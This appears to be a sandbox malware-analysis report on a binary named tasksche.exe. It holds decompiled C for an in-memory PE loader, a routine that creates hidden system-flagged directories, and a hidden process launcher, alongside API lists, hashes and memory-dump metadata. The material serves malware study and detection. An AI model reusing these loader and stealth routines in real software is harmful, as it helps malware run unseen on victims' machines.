                                                                                                                                                							_t83 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                							if(_t83 == 0) {
                                                                                                                                                								goto L37;
                                                                                                                                                							}
                                                                                                                                                							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
                                                                                                                                                							_t159 = _t158 + 0xc;
                                                                                                                                                							if(_t84 == 0) {
                                                                                                                                                								goto L37;
                                                                                                                                                							}
                                                                                                                                                							 *_t84( &_v44);
                                                                                                                                                							_t86 = _v40;
                                                                                                                                                							_t23 = _t151 + 0x50; // 0xec8b55c3
                                                                                                                                                							_t25 = _t86 - 1; // 0xec8b55c2
                                                                                                                                                							_t27 = _t86 - 1; // -1
                                                                                                                                                							_t134 =  !_t27;
                                                                                                                                                							_t155 =  *_t23 + _t25 & _t134;
                                                                                                                                                							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
                                                                                                                                                								goto L2;
                                                                                                                                                							}
                                                                                                                                                							_t31 = _t151 + 0x34; // 0x85680040
                                                                                                                                                							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
                                                                                                                                                							_t127 = _t89;
                                                                                                                                                							_t160 = _t159 + 0x14;
                                                                                                                                                							if(_t127 != 0) {
                                                                                                                                                								L21:
                                                                                                                                                								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
                                                                                                                                                								_t156 = _t91;
                                                                                                                                                								if(_t156 != 0) {
                                                                                                                                                									 *((intOrPtr*)(_t156 + 4)) = _t127;
                                                                                                                                                									_t38 = _t151 + 0x16; // 0xc3004080
                                                                                                                                                									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
                                                                                                                                                									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
                                                                                                                                                									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
									_t54 = _t151 + 0x54; // 0x8328ec83
									if(E00402457(_a8,  *_t54) == 0) {
										L36:
										E004029CC(_t156);
										goto L37;
									}
									_t57 = _t151 + 0x54; // 0x8328ec83
									// VirtualAlloc-style arguments: 0x1000 = MEM_COMMIT, 4 = PAGE_READWRITE
									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
									_t59 = _t151 + 0x54; // 0x8328ec83
									_a32 = _t104;
									// copy the PE headers into the freshly mapped image
									memcpy(_t104, _a4,  *_t59);
									// +0x3c = IMAGE_DOS_HEADER.e_lfanew: locate IMAGE_NT_HEADERS inside the new image
									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
									 *_t156 = _t107;
									// +0x34 = OptionalHeader.ImageBase (PE32): record the actual load address
									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
										goto L36;
									}
									_t68 = _t151 + 0x34; // 0x85680040
									// compare the actual base with the preferred ImageBase; E00402758 (likely base relocation) runs only when they differ
									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
										_t152 = 1;
										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
									} else {
										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
										_t152 = 1;
									}
									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
										// +0x28 = OptionalHeader.AddressOfEntryPoint; 0 means there is no entry point to call
										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
										if(_t116 == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = 0;
											L41:
											return _t156;
										}
										if( *(_t156 + 0x14) == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
											goto L41;
										}
										// call the entry point as DllMain(base, DLL_PROCESS_ATTACH = 1, NULL)
										_push(0);
										_push(_t152);
										_push(_t127);
										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
											goto L41;
										}
										SetLastError(0x45a); // 0x45a = ERROR_DLL_INIT_FAILED
									}
									goto L36;
								}
								_a16(_t127, _t91, 0x8000, _a32); // 0x8000 = MEM_RELEASE
								L23:
								SetLastError(0xe); // 0xe = ERROR_OUTOFMEMORY
								L3:
								goto L37;
							}
							// 0x3000 = MEM_COMMIT | MEM_RESERVE, 4 = PAGE_READWRITE
							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
							_t160 = _t160 + 0x14;
							if(_t127 == 0) {
								goto L23;
							}
							goto L21;
						}
						// walk the IMAGE_SECTION_HEADER table (0x28 bytes per entry; VirtualAddress at +0xc,
						// SizeOfRawData at +0x10) to compute the highest address the mapped image will occupy
						_t145 = _t82 + 0xc;
						do {
							_t157 =  *((intOrPtr*)(_t145 + 4));
							_t124 =  *_t145;
							if(_t157 != 0) {
								_t125 = _t124 + _t157;
							} else {
								_t125 = _t124 + _t126;
							}
							if(_t125 > _v8) {
								_v8 = _t125;
							}
							_t145 = _t145 + 0x28;
							_t146 = _t146 - 1;
						} while (_t146 != 0);
						goto L16;
					}
				}
				L2:
				SetLastError(0xc1); // 0xc1 = ERROR_BAD_EXE_FORMAT
				goto L3;
			}

[Instruction address column of the decompiled listing, detached from its code lines by extraction: 136 entries spanning 0x004021ef to 0x00402450, with 0x00000000 for lines that carry no address]
                                                                                                                                                0x00402283
                                                                                                                                                0x00402286
                                                                                                                                                0x00402289
                                                                                                                                                0x00402289
                                                                                                                                                0x00000000
                                                                                                                                                0x0040226f
                                                                                                                                                0x0040224a
                                                                                                                                                0x00402214
                                                                                                                                                0x00402219
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                                                                                                                                                • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                                                                                                                                                • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                                                                                                                                                  • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                                                                                                                                                • SetLastError.KERNEL32(0000045A), ref: 00402430
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                                                                                                                                                • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                                                                                                                                                • API String ID: 1900561814-3657104962
                                                                                                                                                • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                                                                                                                • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                                                                                                                                                • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                                                                                                                • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                 			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
                                                                                                                                                 				void* _t15;
                                                                                                                                                 				WCHAR* _t17;
                                                                                                                                                 
                                                                                                                                                 				/* Create the parent directory (_a4) and make it the working directory; fail if that is impossible. */
                                                                                                                                                 				CreateDirectoryW(_a4, 0);
                                                                                                                                                 				if(SetCurrentDirectoryW(_a4) == 0) {
                                                                                                                                                 					L2:
                                                                                                                                                 					return 0;
                                                                                                                                                 				}
                                                                                                                                                 				/* Create the child directory (_a8) beneath it and enter it. */
                                                                                                                                                 				_t17 = _a8;
                                                                                                                                                 				CreateDirectoryW(_t17, 0);
                                                                                                                                                 				if(SetCurrentDirectoryW(_t17) != 0) {
                                                                                                                                                 					/* 0x6 = FILE_ATTRIBUTE_HIDDEN (0x2) | FILE_ATTRIBUTE_SYSTEM (0x4): the directory is not shown by default. */
                                                                                                                                                 					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
                                                                                                                                                 					/* Optionally hand the combined path "<_a4>\<_a8>" back to the caller (the decompiler's _push was the fourth argument). */
                                                                                                                                                 					if(_a12 != 0) {
                                                                                                                                                 						swprintf(_a12, L"%s\\%s", _a4, _t17);
                                                                                                                                                 					}
                                                                                                                                                 					_t15 = 1;
                                                                                                                                                 					return _t15;
                                                                                                                                                 				}
                                                                                                                                                 				goto L2;
                                                                                                                                                 			}

                                                                                                                                                 Instruction addresses mapped to the C lines above, in order: 0x00401b07 0x00401b16 0x00401b27 0x00000000 0x00401b27 0x00401b18 0x00401b1e 0x00401b25 0x00401b36 0x00401b40 0x00401b42 0x00401b4e 0x00401b54 0x00401b59 0x00000000 0x00401b59 0x00000000

                                                                                                                                                APIs
                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                                                                                                                                                • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Directory$AttributesCreateCurrentFile$swprintf
                                                                                                                                                • String ID: %s\%s
                                                                                                                                                • API String ID: 1036847564-4073750446
                                                                                                                                                • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                                                                                                                • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                                                                                                                                                • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                                                                                                                • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                 			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
                                                                                                                                                 				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                 				struct _STARTUPINFOA _v88;
                                                                                                                                                 				signed int _t32;
                                                                                                                                                 				intOrPtr _t37;
                                                                                                                                                 
                                                                                                                                                 				/* Zero STARTUPINFOA after cb (0x10 dwords = 0x40 bytes, cb = 0x44 = sizeof(STARTUPINFOA)). */
                                                                                                                                                 				_t32 = 0x10;
                                                                                                                                                 				_v88.cb = 0x44;
                                                                                                                                                 				memset( &(_v88.lpReserved), 0, _t32 << 2);
                                                                                                                                                 				/* Zero the 16-byte PROCESS_INFORMATION: hProcess explicitly, the remaining three dwords via stosd. */
                                                                                                                                                 				_v20.hProcess = 0;
                                                                                                                                                 				asm("stosd");
                                                                                                                                                 				asm("stosd");
                                                                                                                                                 				asm("stosd");
                                                                                                                                                 				/* dwFlags = STARTF_USESHOWWINDOW (1) with wShowWindow = SW_HIDE (0): no visible window for the child. */
                                                                                                                                                 				_t37 = 1;
                                                                                                                                                 				_v88.wShowWindow = 0;
                                                                                                                                                 				_v88.dwFlags = _t37;
                                                                                                                                                 				/* _a4 is the command line; 0x8000000 = CREATE_NO_WINDOW, so a console child gets no console either. */
                                                                                                                                                 				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
                                                                                                                                                 					return 0;
                                                                                                                                                 				}
                                                                                                                                                 				/* _a8 is a timeout in ms; a non-zero wait result (WAIT_TIMEOUT or failure) kills the child with exit code -1. */
                                                                                                                                                 				if(_a8 != 0) {
                                                                                                                                                 					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
                                                                                                                                                 						TerminateProcess(_v20.hProcess, 0xffffffff);
                                                                                                                                                 					}
                                                                                                                                                 					/* Optionally report the child's exit code through _a12. */
                                                                                                                                                 					if(_a12 != 0) {
                                                                                                                                                 						GetExitCodeProcess(_v20.hProcess, _a12);
                                                                                                                                                 					}
                                                                                                                                                 				}
                                                                                                                                                 				CloseHandle(_v20.hProcess);
                                                                                                                                                 				CloseHandle(_v20.hThread);
                                                                                                                                                 				return _t37;
                                                                                                                                                 			}

                                                                                                                                                 Instruction addresses mapped to the C lines above, in order: 0x00401070 0x00401074 0x0040107d 0x00401082 0x00401085 0x00401086 0x00401087 0x0040108d 0x0040108e 0x004010a1 0x004010b0 0x00000000 0x004010f7 0x004010b5 0x004010c5 0x004010cc 0x004010cc 0x004010d5 0x004010dd 0x004010dd 0x004010d5 0x004010ec 0x004010f1 0x00000000

                                                                                                                                                APIs
                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                                                                                                                                                • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004010EC
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004010F1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                                                                                                                • String ID: D
                                                                                                                                                • API String ID: 786732093-2746444292
                                                                                                                                                • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                                                                                                                • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                                                                                                                                                • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                                                                                                                • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                				CHAR* _v8;
                                                                                                                                                				intOrPtr* _v24;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				struct _STARTUPINFOA _v96;
                                                                                                                                                				int _v100;
                                                                                                                                                				char** _v104;
                                                                                                                                                				int _v108;
                                                                                                                                                				void _v112;
                                                                                                                                                				char** _v116;
                                                                                                                                                				intOrPtr* _v120;
                                                                                                                                                				intOrPtr _v124;
                                                                                                                                                				intOrPtr* _t23;
                                                                                                                                                				intOrPtr* _t24;
                                                                                                                                                				void* _t27;
                                                                                                                                                				void _t29;
                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                				signed int _t38;
                                                                                                                                                				int _t40;
                                                                                                                                                				intOrPtr* _t41;
                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                
                                                                                                                                                				_push(0xffffffff);
                                                                                                                                                				_push(0x40d488);
                                                                                                                                                				_push(0x4076f4);
                                                                                                                                                				_push( *[fs:0x0]);
                                                                                                                                                				 *[fs:0x0] = _t58;
                                                                                                                                                				_v28 = _t58 - 0x68;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				__set_app_type(2);
                                                                                                                                                				 *0x40f94c =  *0x40f94c | 0xffffffff;
                                                                                                                                                				 *0x40f950 =  *0x40f950 | 0xffffffff;
                                                                                                                                                				_t23 = __p__fmode();
                                                                                                                                                				_t46 =  *0x40f948; // 0x0
                                                                                                                                                				 *_t23 = _t46;
                                                                                                                                                				_t24 = __p__commode();
                                                                                                                                                				_t47 =  *0x40f944; // 0x0
                                                                                                                                                				 *_t24 = _t47;
                                                                                                                                                				 *0x40f954 = _adjust_fdiv;
                                                                                                                                                				_t27 = E0040793F( *_adjust_fdiv);
                                                                                                                                                				_t61 =  *0x40f870; // 0x1
                                                                                                                                                				if(_t61 == 0) {
                                                                                                                                                					__setusermatherr(E0040793C);
                                                                                                                                                				}
                                                                                                                                                				E0040792A(_t27);
                                                                                                                                                				_push(0x40e00c);
                                                                                                                                                				_push(0x40e008);
                                                                                                                                                				L00407924();
                                                                                                                                                				_t29 =  *0x40f940; // 0x0
                                                                                                                                                				_v112 = _t29;
                                                                                                                                                				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
                                                                                                                                                				_push(0x40e004);
                                                                                                                                                				_push(0x40e000);
                                                                                                                                                				L00407924();
                                                                                                                                                				_t55 =  *_acmdln;
                                                                                                                                                				_v120 = _t55;
                                                                                                                                                				if( *_t55 != 0x22) {
                                                                                                                                                					while(1) {
                                                                                                                                                						__eflags =  *_t55 - 0x20;
                                                                                                                                                						if(__eflags <= 0) {
                                                                                                                                                							goto L7;
                                                                                                                                                						}
                                                                                                                                                						_t55 = _t55 + 1;
                                                                                                                                                						_v120 = _t55;
                                                                                                                                                					}
                                                                                                                                                				} else {
                                                                                                                                                					do {
                                                                                                                                                						_t55 = _t55 + 1;
                                                                                                                                                						_v120 = _t55;
                                                                                                                                                						_t42 =  *_t55;
                                                                                                                                                					} while (_t42 != 0 && _t42 != 0x22);
                                                                                                                                                					if( *_t55 == 0x22) {
                                                                                                                                                						L6:
                                                                                                                                                						_t55 = _t55 + 1;
                                                                                                                                                						_v120 = _t55;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				L7:
                                                                                                                                                				_t36 =  *_t55;
                                                                                                                                                				if(_t36 != 0 && _t36 <= 0x20) {
                                                                                                                                                					goto L6;
                                                                                                                                                				}
                                                                                                                                                				_v96.dwFlags = 0;
                                                                                                                                                				GetStartupInfoA( &_v96);
                                                                                                                                                				_t69 = _v96.dwFlags & 0x00000001;
                                                                                                                                                				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                                                                                                					_t38 = 0xa;
                                                                                                                                                				} else {
                                                                                                                                                					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                                                                                                                				}
                                                                                                                                                				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
                                                                                                                                                				_v108 = _t40;
                                                                                                                                                				exit(_t40);
                                                                                                                                                				_t41 = _v24;
                                                                                                                                                				_t49 =  *((intOrPtr*)( *_t41));
                                                                                                                                                				_v124 = _t49;
                                                                                                                                                				_push(_t41);
                                                                                                                                                				_push(_t49);
                                                                                                                                                				L0040791E();
                                                                                                                                                				return _t41;
                                                                                                                                                			}

                                                                                                                                                0x004077bd
                                                                                                                                                0x004077bf
                                                                                                                                                0x004077c4
                                                                                                                                                0x004077cf
                                                                                                                                                0x004077d0
                                                                                                                                                0x004077dd
                                                                                                                                                0x004077e2
                                                                                                                                                0x004077e7
                                                                                                                                                0x004077ee
                                                                                                                                                0x004077f5
                                                                                                                                                0x004077fc
                                                                                                                                                0x00407802
                                                                                                                                                0x00407808
                                                                                                                                                0x0040780a
                                                                                                                                                0x00407810
                                                                                                                                                0x00407816
                                                                                                                                                0x0040781f
                                                                                                                                                0x00407824
                                                                                                                                                0x00407829
                                                                                                                                                0x0040782f
                                                                                                                                                0x00407836
                                                                                                                                                0x0040783c
                                                                                                                                                0x0040783d
                                                                                                                                                0x00407842
                                                                                                                                                0x00407847
                                                                                                                                                0x0040784c
                                                                                                                                                0x00407851
                                                                                                                                                0x00407856
                                                                                                                                                0x0040786f
                                                                                                                                                0x00407875
                                                                                                                                                0x0040787a
                                                                                                                                                0x0040787f
                                                                                                                                                0x0040788c
                                                                                                                                                0x0040788e
                                                                                                                                                0x00407894
                                                                                                                                                0x004078d0
                                                                                                                                                0x004078d0
                                                                                                                                                0x004078d3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004078d5
                                                                                                                                                0x004078d6
                                                                                                                                                0x004078d6
                                                                                                                                                0x00407896
                                                                                                                                                0x00407896
                                                                                                                                                0x00407896
                                                                                                                                                0x00407897
                                                                                                                                                0x0040789a
                                                                                                                                                0x0040789c
                                                                                                                                                0x004078a7
                                                                                                                                                0x004078a9
                                                                                                                                                0x004078a9
                                                                                                                                                0x004078aa
                                                                                                                                                0x004078aa
                                                                                                                                                0x004078a7
                                                                                                                                                0x004078ad
                                                                                                                                                0x004078ad
                                                                                                                                                0x004078b1
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004078b7
                                                                                                                                                0x004078be
                                                                                                                                                0x004078c4
                                                                                                                                                0x004078c8
                                                                                                                                                0x004078dd
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078e9
                                                                                                                                                0x004078ee
                                                                                                                                                0x004078f2
                                                                                                                                                0x004078f8
                                                                                                                                                0x004078fd
                                                                                                                                                0x004078ff
                                                                                                                                                0x00407902
                                                                                                                                                0x00407903
                                                                                                                                                0x00407904
                                                                                                                                                0x0040790b

                                                                                                                                                APIs
                                                                                                                                                • __set_app_type.MSVCRT(00000002), ref: 004077E7
                                                                                                                                                • __p__fmode.MSVCRT ref: 004077FC
                                                                                                                                                • __p__commode.MSVCRT ref: 0040780A
                                                                                                                                                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                                                                                                                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                                                                                                                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3626615345-0
                                                                                                                                                • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                                                                                                                • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                                                                                                                                                • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                                                                                                                • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E00407831(CHAR* __ebx) {
                                                                                                                                                				void* _t19;
                                                                                                                                                				void _t21;
                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                				signed int _t30;
                                                                                                                                                				int _t32;
                                                                                                                                                				intOrPtr* _t33;
                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                				CHAR* _t35;
                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                				intOrPtr* _t41;
                                                                                                                                                				void* _t42;
                                                                                                                                                
                                                                                                                                                				_t35 = __ebx;
                                                                                                                                                				__setusermatherr(E0040793C);
                                                                                                                                                				E0040792A(_t19);
                                                                                                                                                				_push(0x40e00c);
                                                                                                                                                				_push(0x40e008);
                                                                                                                                                				L00407924();
                                                                                                                                                				_t21 =  *0x40f940; // 0x0
                                                                                                                                                				 *(_t42 - 0x6c) = _t21;
                                                                                                                                                				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
                                                                                                                                                				_push(0x40e004);
                                                                                                                                                				_push(0x40e000);
                                                                                                                                                				L00407924();
                                                                                                                                                				_t41 =  *_acmdln;
                                                                                                                                                				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                                                                                                                				if( *_t41 != 0x22) {
                                                                                                                                                					while(1) {
                                                                                                                                                						__eflags =  *_t41 - 0x20;
                                                                                                                                                						if(__eflags <= 0) {
                                                                                                                                                							goto L6;
                                                                                                                                                						}
                                                                                                                                                						_t41 = _t41 + 1;
                                                                                                                                                						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                                                                                                                					}
                                                                                                                                                				} else {
                                                                                                                                                					do {
                                                                                                                                                						_t41 = _t41 + 1;
                                                                                                                                                						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                                                                                                                						_t34 =  *_t41;
                                                                                                                                                					} while (_t34 != _t35 && _t34 != 0x22);
                                                                                                                                                					if( *_t41 == 0x22) {
                                                                                                                                                						L5:
                                                                                                                                                						_t41 = _t41 + 1;
                                                                                                                                                						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				L6:
                                                                                                                                                				_t28 =  *_t41;
                                                                                                                                                				if(_t28 != _t35 && _t28 <= 0x20) {
                                                                                                                                                					goto L5;
                                                                                                                                                				}
                                                                                                                                                				 *(_t42 - 0x30) = _t35;
                                                                                                                                                				GetStartupInfoA(_t42 - 0x5c);
                                                                                                                                                				_t52 =  *(_t42 - 0x30) & 0x00000001;
                                                                                                                                                				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
                                                                                                                                                					_t30 = 0xa;
                                                                                                                                                				} else {
                                                                                                                                                					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
                                                                                                                                                				}
                                                                                                                                                				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
                                                                                                                                                				 *(_t42 - 0x68) = _t32;
                                                                                                                                                				exit(_t32);
                                                                                                                                                				_t33 =  *((intOrPtr*)(_t42 - 0x14));
